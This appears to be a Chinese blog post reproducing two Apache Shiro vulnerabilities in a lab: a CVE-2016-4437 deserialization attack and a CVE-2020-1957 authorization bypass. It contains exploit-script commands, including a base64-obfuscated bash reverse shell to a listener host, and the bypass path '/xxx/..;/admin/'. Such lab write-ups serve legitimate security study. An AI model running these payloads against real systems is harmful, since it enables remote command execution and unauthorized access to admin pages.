【shiro漏洞复现】CVE-2016-4437反序列化漏洞+CVE-2020-1957权限绕过漏洞

最新推荐文章于 2024-05-12 10:41:40 发布
最新推荐文章于 2024-05-12 10:41:40 发布
阅读量520 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120030124
版权

1.CVE-2016-4437

Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-meCookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

1.证明存在shiro漏洞:(win7虚拟机)

打开下载好的ShiroExploit.jar,进入图形化Shiro检测界面,输入靶机ip,点击下一步。

2.选择第一个使用ceye.io进行漏洞检测,点击下一步,开始执行检测。在图形界面中勾选第一个反弹shell,填入相应信息,点击执行。

3.同时在攻击机kali2上进行监听,发现攻击机成功连接到kali1上

4.还有一个漏洞脚本:

1)尝试执行向靶机写入文档:

python3 shiro_exploit.py -t 3 -u http://192.168.225.139:8080 -p "touch a.txt"

2)尝试反弹shell:

python3 shiro_exploit.py -t 3 -u http://192.168.225.139:8080 -p "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xMzMvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"

2.CVE-2020-1957

Shiro框架通过拦截器功能来对用户访问权限进行控制,如anon,authc等拦截器。

anon为匿名拦截器,不需要登录即可访问;

authc为登录拦截器,需要登录才可以访问。

ShiroURL路径表达式为Ant格式,路径通配符*表示匹配零个或多个字符串,/*可以匹配/hello,但是匹配不到/hello/,因为*通配符无法匹配路径。假设/hello接口设置了authc拦截器,访问/hello会进行权限判断,但如果访问的是/hello/,那么将无法正确匹配URL,直接放行,进入到spring拦截器。spring中的/hello/hello/形式的URL访问的资源是一样的,从而实现了权限绕过。

主要是Spring web在匹配url的时候没有匹配上/导致绕过

1.访问8080端口,可以看到需要登录,直接访问admin会被302重定向到login.html

抓包出来也可以说明这个问题:

这个应用中对URL权限的配置如下:

2.构造恶意请求/xxx/..;/admin/即可绕过权限校验,访问到管理页面。

URL请求过程:

客户端请求URL:/xxx/..;/admin/

Shrio内部处理得到校验URL/xxxx/..,校验通过

SpringBoot处理/xxx/..;/admin/,最终请求/admin/,成功访问了后台请求。

malloc_冲!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java反序列化漏洞利用工具_漏洞复现:CVE20164437 Apache Shiro 反序列化
weixin_39930748的博客
11-27 774
一、漏洞描述Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中...
反序列化工具_Apache Shiro 1.2.4反序列化漏洞复现CVE20164437
weixin_39943799的博客
12-14 533
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。影响版本:Apache Shiro <= 1.2.4使用vulhub搭建docker环境进入主页使用ShiroExploit图形化工具(工具下载地址:https://github.com/feihong-cs/ShiroExploit-Depreca...
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 Shiro550影响版本: - Apache Shiro<=1.2.4 exp: ``` GUI
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
其他的 框架安全:Apache Shiro 未授权访问漏洞.(CVE-2020-1957 || CVE-2020-11989)
最新发布
网络安全领域___专研者.
05-12 522
Apache Shiro 是一个强大且易用的Java安全框架,它为应用程序提供了身份验证、授权、加密和会话管理等常见的安全功能。漏洞大多会发生在登录处,返回包里包含remeberMe=deleteMe字段.(Shiro 这个属于第三方的,Apache 中的 Shiro
shiro CVE-2016-4437 漏洞复现
qq_40646572的博客
05-09 857
shiro550漏洞漏洞点就在于用户信息反序列化可利用,并且加密的key值给了一个固定的默认值的,导致很多开发人员直接使用,接着导致了洞的产生。
Shiro反弹shell和权限绕过含工具包
02-18 1006
CVE-2019-12422】使用python脚本判断是否存在shiro漏洞,反弹shell漏洞利用,【CVE-2020-1957Shiro权限绕过漏洞
shiro反序列化漏洞复现(CVE-2016-4437)
huangyongkang666的博客
04-14 3627
shiro反序列化漏洞复现(CVE-2016-4437) 1.漏洞简介 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序 漏洞原理: 在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编
Apache Shiro 反序列化漏洞复现CVE-20164437
a10534126的博客
03-31 351
#Apache Shiro 反序列化漏洞CVE-20164437)# 一、漏洞简介 Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 二、漏洞影响 影响版本 Apache Shiro <=
shiro1.2.4反序列化漏洞(CVE-2016-4437)的问题分析(一)
donggongai的博客
07-26 1271
在某个项目中依赖了shiro1.2.4,结果收到了网警的一纸警告,警告上明确写道存在CVE-2016-4437以及造成此漏洞的罪魁祸首是使用了
shiro反序列化漏洞CVE-2016-4437
m0_49025459的博客
12-06 166
Apache Shiro默认使用了CookieRememberMeManager。其处理cookie的流程是:得到rememberMe的cookie值;Base64解码;AES解密;反序列化。然而AES的密钥是硬编码的,即AES加解密的密钥是写死在代码中的,攻击者可以构造恶意数据造成反序列化漏洞。Apache Shiro
详细shiro漏洞复现及利用方法(CVE-2016-4437
热门推荐
dreamthe的博客
04-26 2万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
[CVE-2016-4437] Apache Shiro 安全框架反序列化漏洞复现与原理详细分析
Specif1c的博客
10-21 4943
Apache Shiro是一个强大且易用的 Java安全框架,执行身份验证、授权、密码和会话管理。shiro 相比于 springsecurity 简单许多,官方号称 10 分钟就能学会。shiro 反序列化漏洞是 Java 经典漏洞,于2016年被挖掘出来,到现在依旧很多系统存在该漏洞,非常值得学习,对加深 shiro 认证机制的理解以及java代码审计颇有帮助。
CVE-2016-4437shiro550复现
Mr_atopos的博客
06-18 782
shiro550复现及原理分析
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 2777
CVE-2016-4437 Shiro反序列化漏洞复现
CVE-2016-4437---Shiro反序列化漏洞
qq_44880255的博客
08-10 3997
1、影响版本 Apache Shiro <= 1.2.4 2、漏洞原因 Apache Shiro默认使用了CookieRememberMeManager。其处理cookie的流程是: 得到rememberMe的cookie值;Base64解码;AES解密;反序列化。 然而AES的密钥是硬编码的,即AES加解密的密钥是写死在代码中的,攻击者可以构造恶意数据造成反序列化漏洞。 3、漏洞复现 这里使用的环境是Kali中的vulhub和docker。 首先进入目录vulhub/shiro/CVE-2016
Apache Shiro 默认密钥致命令执行漏洞CVE-2016-4437)【远程扫描】
DK_ajie的博客
02-24 5216
漏洞详情 Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 目标IP站点存在Apache shiro 已知密钥泄露导致的远程代码执行漏洞。通过查找项目源码发现,在shiro的配置文件里,确实写死了一个秘钥,在开发环境的中不建议直接写死秘钥,大家要引以为戒! 后面通过源码分析,发现了shiro有自己的随机生成秘钥的方法。既然找到的方法,那
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
good good study
03-28 9566
Shiro 1.2.4 反序列化漏洞
反序列化漏洞(一)Shiro漏洞CVE-2016-4437复现
02-14 1011
反序列化漏洞(一):反序列化漏洞原理、Shiro漏洞原理和CVE-2016-4437复现
spring boot 解决Apache Shiro身份认证绕过漏洞CVE-2023-22602)
06-02
对于Spring Boot项目中的Apache Shiro身份认证绕过漏洞CVE-2023-22602),可以通过以下步骤进行解决: 1.升级Apache Shiro到1.7.1或更高版本。可以在项目的Maven或Gradle依赖中更新Apache Shiro的版本。 2.检查...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值